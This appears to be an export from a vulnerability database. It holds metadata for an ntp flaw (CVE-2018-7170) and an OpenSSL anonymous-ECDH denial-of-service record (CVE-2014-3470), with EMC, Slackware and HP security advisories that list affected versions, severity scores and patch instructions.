"PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "146631" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-7170", "trust": 3.1 }, { "db": "BID", "id": "103194", "trust": 2.1 }, { "db": "PACKETSTORM", "id": "146631", "trust": 1.9 }, { "db": "JVNDB", "id": "JVNDB-2018-002748", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201803-144", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "147917", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-137202", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2018-7170", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-137202" }, { "db": "VULMON", "id": "CVE-2018-7170" }, { "db": "BID", "id": "103194" }, { "db": "JVNDB", "id": "JVNDB-2018-002748" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "146631" }, { "db": "NVD", "id": "CVE-2018-7170" }, { "db": "CNNVD", "id": "CNNVD-201803-144" } ] }, "id": "VAR-201803-1837", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-137202" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T11:25:38.925000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "NTP Bug 3415", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/ntpbug3415" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.slackware.com/" }, { "title": "Synology-SA-18:13", "trust": 0.8, "url": "https://www.synology.com/support/security/synology_sa_18_13" }, { "title": "NTP nptd Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=78918" }, { "title": "Red Hat: CVE-2018-7170", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2018-7170" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2018-7170" }, { "title": "Amazon Linux AMI: ALAS-2018-1083", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2018-1083" }, { "title": "Arch Linux Advisories: [ASA-201803-11] ntp: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201803-11" }, { "title": "Amazon Linux AMI: ALAS-2018-1009", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2018-1009" }, { "title": "Symantec Security Advisories: SA165: NTP Vulnerabilities February 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=da5461c25da2ae6e47cc299477576a12" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2019", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=4ee609eeae78bbbd0d0c827f33a7f87f" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=72fe5ebf222112c8481815fd7cefc7af" } ], "sources": [ { "db": "VULMON", "id": "CVE-2018-7170" }, { "db": "JVNDB", "id": "JVNDB-2018-002748" }, { "db": "CNNVD", "id": "CNNVD-201803-144" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 }, { "problemtype": "CWE-19", "trust": 0.9 }, { "problemtype": "CWE-320", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-137202" }, { "db": "JVNDB", "id": "JVNDB-2018-002748" }, { "db": "NVD", "id": "CVE-2018-7170" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "http://www.securityfocus.com/bid/103194" }, { "trust": 2.4, "url": "http://packetstormsecurity.com/files/146631/slackware-security-advisory-ntp-updates.html" }, { "trust": 2.1, "url": "http://support.ntp.org/bin/view/main/ntpbug3415" }, { "trust": 2.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1550214" }, { "trust": 1.9, "url": "https://security.gentoo.org/glsa/201805-12" }, { "trust": 1.8, "url": "http://www.securityfocus.com/archive/1/541824/100/0/threaded" }, { "trust": 1.8, "url": "https://security.netapp.com/advisory/ntap-20180626-0001/" }, { "trust": 1.8, "url": "https://www.synology.com/support/security/synology_sa_18_13" }, { "trust": 1.8, "url": "https://security.freebsd.org/advisories/freebsd-sa-18:02.ntp.asc" }, { "trust": 1.7, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbux03962en_us" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7170" }, { "trust": 0.9, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7170" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "https://www.oracle.com/technetwork/topics/security/bulletinapr2018-4443185.html" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7185" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7184" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7182" }, { "trust": 0.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbux03962en_us" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=56953" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7183" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7182" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7185" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1549" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1549" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7184" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://support.ntp.org/bin/view/main/securitynotice#february_2018_ntp_4_2_8p11_ntp_s" } ], "sources": [ { "db": "VULHUB", "id": "VHN-137202" }, { "db": "VULMON", "id": "CVE-2018-7170" }, { "db": "BID", "id": "103194" }, { "db": "JVNDB", "id": "JVNDB-2018-002748" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "146631" }, { "db": "NVD", "id": "CVE-2018-7170" }, { "db": "CNNVD", "id": "CNNVD-201803-144" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-137202" }, { "db": "VULMON", "id": "CVE-2018-7170" }, { "db": "BID", "id": "103194" }, { "db": "JVNDB", "id": "JVNDB-2018-002748" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "146631" }, { "db": "NVD", "id": "CVE-2018-7170" }, { "db": "CNNVD", "id": "CNNVD-201803-144" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-03-06T00:00:00", "db": "VULHUB", "id": "VHN-137202" }, { "date": "2018-03-06T00:00:00", "db": "VULMON", "id": "CVE-2018-7170" }, { "date": "2018-02-27T00:00:00", "db": "BID", "id": "103194" }, { "date": "2018-04-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-002748" }, { "date": "2018-05-26T22:55:24", "db": "PACKETSTORM", "id": "147917" }, { "date": "2018-03-01T23:35:00", "db": "PACKETSTORM", "id": "146631" }, { "date": "2018-03-06T20:29:01.297000", "db": "NVD", "id": "CVE-2018-7170" }, { "date": "2018-03-07T00:00:00", "db": "CNNVD", "id": "CNNVD-201803-144" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-06-18T00:00:00", "db": "VULHUB", "id": "VHN-137202" }, { "date": "2020-06-18T00:00:00", "db": "VULMON", "id": "CVE-2018-7170" }, { "date": "2018-08-15T10:00:00", "db": "BID", "id": "103194" }, { "date": "2018-04-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-002748" }, { "date": "2020-06-18T14:01:28.270000", "db": "NVD", "id": "CVE-2018-7170" }, { "date": "2019-11-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201803-144" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "147917" }, { "db": "CNNVD", "id": "CNNVD-201803-144" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ntp Data processing vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-002748" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "encryption problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201803-144" } ], "trust": 0.6 } }
var-201406-0117
Vulnerability from variot
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. OpenSSL is prone to a denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. OpenSSL prior to 0.9.8za, 1.0.0m, and 1.0.1h are vulnerable. As long as all other products which SMH V7.3.3.1 for Linux x86 communicates with have been upgraded to the latest versions, it will not be vulnerable to the exploits described in CVE-2014-0224. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
ESA-2014-079: EMC Documentum Content Server Multiple Vulnerabilities
EMC Identifier: ESA-2014-079
CVE Identifier: See below for individual CVEs
Severity Rating: CVSS v2 Base Score: See below for individual CVSS score for each CVE
Affected products:
\x95 All EMC Documentum Content Server versions of 7.1 prior to P07
\x95 All EMC Documentum Content Server versions of 7.0
\x95 All EMC Documentum Content Server versions of 6.7 SP2 prior to P16
\x95 All EMC Documentum Content Server versions of 6.7 SP1
\x95 All EMC Documentum Content Server versions prior to 6.7 SP1
Summary:
EMC Documentum Content Server contains fixes for multiple vulnerabilities which also include vulnerabilities disclosed by the OpenSSL project on June 5, 2014 in OpenSSL.
Details: EMC Documentum Content Server may be susceptible to the following vulnerabilities:
\x95 Arbitrary Code Execution (CVE-2014-4618): Authenticated non-privileged users can potentially execute Documentum methods with higher level privileges (up to and including superuser privileges) due to improper authorization checks being performed on user-created system objects. CVSS v2 Base Score: 8.2 (AV:N/AC:M/Au:S/C:C/I:C/A:P)
\x95 DQL Injection (CVE-2014-2520): Certain DQL hints in EMC Documentum Content Server may be potentially exploited by an authenticated non-privileged malicious user to conduct DQL injection attacks and read the database contents. This issue only affects Content Server running on Oracle database. CVSS v2 Base Score: 6.3 (AV:N/AC:M/Au:S/C:C/I:N/A:N)
\x95 Information Disclosure (CVE-2014-2521): Authenticated non-privileged users are allowed to retrieve meta-data of unauthorized system objects due to improper authorization checks being performed on certain RPC commands in Content Server. CVSS v2 Base Score: 6.3 (AV:N/AC:M/Au:S/C:C/I:N/A:N)
\x95 Multiple OpenSSL vulnerabilities (See individual CVEs below and refer to NVD for each of their scores): SSL/TLS Man-in-the-middle (MITM) vulnerability (CVE-2014-0224) DTLS recursion flaw (CVE-2014-0221) DTLS invalid fragment vulnerability (CVE-2014-0195) SSL_MODE_RELEASE_BUFFERS NULL pointer deference (CVE-2014-0198) SSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298) Anonymous ECDH denial of service (CVE-2014-3470) FLUSH + RELOAD cache side-channel attack (CVE-2014-0076) For more information about these vulnerabilities, please visit the original OpenSSL advisory https://www.openssl.org/news/secadv_20140605.txt
Resolution: The following versions contain the resolution for these issues: \x95 EMC Documentum Content Server version 7.1 P07 and later \x95 EMC Documentum Content Server version 7.0: Hotfixes are available for Windows & Linux. Contact EMC Support to obtain them. For Solaris and AIX, contact EMC Support to open Hotfix requests. \x95 EMC Documentum Content Server version 6.7 SP2 P16 and later \x95 EMC Documentum Content Server version 6.7 SP1: Hotfixes are available for Windows & Linux. Contact EMC Support to obtain them. For Solaris and AIX, contact EMC Support to open Hotfix requests.
EMC recommends all customers to upgrade to one of the above versions at the earliest opportunity.
Link to remedies: Registered EMC Online Support customers can download patches and software from support.emc.com at: https://support.emc.com/downloads/2732_Documentum-Server
For Hotfix, contact EMC Support.
Read and use the information in this EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this product alert, contact EMC Software Technical Support at 1-877-534-2867.
For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.
EMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
[slackware-security] openssl (SSA:2014-156-03)
New openssl packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix security issues.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1h-i486-1_slack14.1.txz: Upgraded. For more information, see: http://www.openssl.org/news/secadv_20140605.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470 ( Security fix ) patches/packages/openssl-solibs-1.0.1h-i486-1_slack14.1.txz: Upgraded. +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8za-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8za-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8za-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8za-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8za-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8za-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8za-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8za-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8za-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8za-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8za-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8za-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1h-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1h-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1h-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1h-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1h-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1h-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1h-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1h-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1h-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1h-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1h-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1h-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 634b8ecc8abc6d3f249b73d0fefa5959 openssl-0.9.8za-i486-1_slack13.0.txz a2529f1243d42a3608f61b96236b5f60 openssl-solibs-0.9.8za-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: 2ddac651c5f2531f3a7f70d9f5823bd6 openssl-0.9.8za-x86_64-1_slack13.0.txz d7ffeb15713a587f642fbb3d5c310c75 openssl-solibs-0.9.8za-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 0b84a6a1edf76cba83d4c52c54196baa openssl-0.9.8za-i486-1_slack13.1.txz dfd5d241b0e1703ae9d70d6ccda06179 openssl-solibs-0.9.8za-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: bd749622577a5f76a59d90b95aa922fd openssl-0.9.8za-x86_64-1_slack13.1.txz 35cf911dd9f0cc13f7f0056d9e1f4520 openssl-solibs-0.9.8za-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 8f674defac9002c81265d284b1072f75 openssl-0.9.8za-i486-1_slack13.37.txz 48ce79e7714cb0c823d2b6ea4a88ba51 openssl-solibs-0.9.8za-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: efa09162c22782c15806bca99472c5be openssl-0.9.8za-x86_64-1_slack13.37.txz 8e3b8d1e3d3a740bd274fbe38dc10f96 openssl-solibs-0.9.8za-x86_64-1_slack13.37.txz
Slackware 14.0 packages: 8e2698d19f54c7e0cac8f998df23b782 openssl-1.0.1h-i486-1_slack14.0.txz cf6233bc169cf6dd192bb7210f779fc1 openssl-solibs-1.0.1h-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 2b4f0610d5e46fa7bb27a0b39f0d6d33 openssl-1.0.1h-x86_64-1_slack14.0.txz 18fdd83dcf86204275508a689a017dea openssl-solibs-1.0.1h-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 49aea7da42eef41da894f29762971863 openssl-1.0.1h-i486-1_slack14.1.txz 6f19f4fdc3f018b4e821c519d7bb1e5c openssl-solibs-1.0.1h-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: ccf5ff2b107c665a4f3bf98176937749 openssl-1.0.1h-x86_64-1_slack14.1.txz ea1aaba38c98b096186ca94ca541a793 openssl-solibs-1.0.1h-x86_64-1_slack14.1.txz
Slackware -current packages: db1ed7ded71ab503f567940fff39eb16 a/openssl-solibs-1.0.1h-i486-1.txz 0db4f91f9b568b2b2629950e5ab88b22 n/openssl-1.0.1h-i486-1.txz
Slackware x86_64 -current packages: d01aef33335bee27f36574241f54091f a/openssl-solibs-1.0.1h-x86_64-1.txz 95a743d21c58f39573845d6ec5270656 n/openssl-1.0.1h-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1h-i486-1_slack14.1.txz openssl-solibs-1.0.1h-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04355095
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04355095 Version: 1
HPSBMU03062 rev.1 - HP Insight Control server deployment on Linux and Windows running OpenSSL, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-08-08 Last Updated: 2014-08-08
Potential Security Impact: Remote denial of service (DoS), code execution, unauthorized access, disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH), HP Smart Update Manager (SUM), and HP Version Control Agent (VCA) running on Linux and Windows. These components of HP Insight Control server deployment could be exploited remotely resulting in denial of service (DoS), code execution, unauthorized access, or disclosure of information.
HP Insight Control server deployment packages HP System Management Homepage (SMH) and HP Version Control Agent (VCA), and HP Smart Update Manager (SUM) and deploys them through the following components. This bulletin provides the information needed to update the HP Insight Control server deployment solution.
Install HP Management Agents for Windows x86/x64 Install HP Management Agents for RHEL 5 x64 Install HP Management Agents for RHEL 6 x64 Install HP Management Agents for SLES 10 x64 Install HP Management Agents for SLES 11 x64 Upgrade Proliant Firmware
References:
CVE-2010-5298 Remote Denial of Service CVE-2014-0076 Unauthorized Disclosure of Information CVE-2014-0195 Remote Unauthorized Access CVE-2014-0198 Remote Denial of Service CVE-2014-0221 Remote Denial of Service (DoS) CVE-2014-0224 Remote Unauthorized Access or Disclosure of Information CVE-2014-3470 Remote Code Execution or Unauthorized Access SSRT101628
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2, v7.3.1
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0 CVE-2014-0076 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-0195 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0221 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-3470 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following updates to v7.3.1 of HP Insight Control server deployment to resolve this vulnerability. HP has provided manual update steps if a version upgrade is not possible; if users wish to remain at v7.1.2, v7.2.0, or v7.2.1.
Note: It is important to check your current running version of HP Insight Control server deployment and to follow the correct steps listed below. For HP Insight Control server deployment v7.2.2, users must upgrade to v7.3.1 and follow the steps below to remove the vulnerability. The vulnerability known as Heartbleed (CVE-2014-0160) was fixed in HP Insight Control server deployment v7.3.1. That Security Bulletin with instructions on how to upgrade to v7.3.1 can be found here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n a-c04267749
HP Insight Control server deployment users of v7.1.2, v7.2.0, v7.2.1 should take the following steps to remove this vulnerability.
Delete the files smhamd64-.exe/smhx86-.exe" from Component Copy Location listed in the following table, rows 1 and 2. Delete the files "vcax86-.exe/vcaamd64-.exe from Component Copy Location listed in the following table, rows 3 and 4. Delete the files hpsmh-7.*.rpm" from Component Copy Location listed in row 5. In sequence, perform the steps from left to right in the following table. First, download components from Download Link; Second, rename the component as suggested in Rename to. Third, copy the component to the location specified in Component Copy Location. Table Row Number Download Link Rename to Component Copy Location
1 http://www.hp.com/swpublishing/MTX-e8076c2a35804685ad65b2b1ba smhamd64-ccp023716.exe \express\hpfeatures\hpagents-ws\components\Win2008
2 http://www.hp.com/swpublishing/MTX-3395d737d98f42149125b9bb05 smhx86-cp023715.exe \express\hpfeatures\hpagents-ws\components\Win2008
3 http://www.hp.com/swpublishing/MTX-8aefeaf490284a7691eca97d13 vcax86-cp023742.exe \express\hpfeatures\hpagents-ws\components\Win2008
4 http://www.hp.com/swpublishing/MTX-c0d32bac154a4d93839d8cd1f2 vcaamd64-cp023743.exe \express\hpfeatures\hpagents-ws\components\Win2008
5 http://www.hp.com/swpublishing/MTX-bd9a1cf60e344c549c4888db93 Do not rename the downloaded component for this step. \express\hpfeatures\hpagents-sles11-x64\components \express\hpfeatures\hpagents-sles10-x64\components \express\hpfeatures\hpagents-rhel5-x64\components \express\hpfeatures\hpagents-rhel6-x64\components
Download and extract the HPSUM 5.3.6 component from ftp://ftp.hp.com/pub/softlib2/software1/pubsw-windows/p750586112/v99793
Copy all content from extracted ZIP folder and paste into \eXpress\hpfeatures\fw-proLiant\components Initiate Install HP Management Agents for SLES 11 x64 on targets running SLES11 x64. Initiate Install HP Management Agents for SLES 10 x64 on targets running SLES10 x64. Initiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL 6 x64. Initiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL 5 x64. Initiate Install HP Management Agents for Windows x86/x64 on targets running Windows.
HP Insight Control server deployment users with v7.2.2:
Please upgrade to Insight Control server deployment v7.3.1 and follow the steps below for v7.3.1.
HP Insight Control server deployment users with v7.3.1:
Perform steps 1 - 4 as outlined above for users with HP Insight Control server deployment v7.1.2, v7.2.0, and v7.2.1. Download the HP SUM ZIP file from http://www.hp.com/swpublishing/MTX-f6c141a7feeb4a358bbb28300f
Extract the contents from the HP SUM ZIP file to \eXpress\hpfeatures\fw-proLiant\components location on the Insight Control server deployment server
Related security bulletins:
For System Management Homepage please see Security bulletin HPSBMU03051 https ://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04 345210
For HP Version Control Agent please see Security bulletin HPSBMU03057 https:/ /h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c0434 9897
HISTORY Version:1 (rev.1) - 8 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
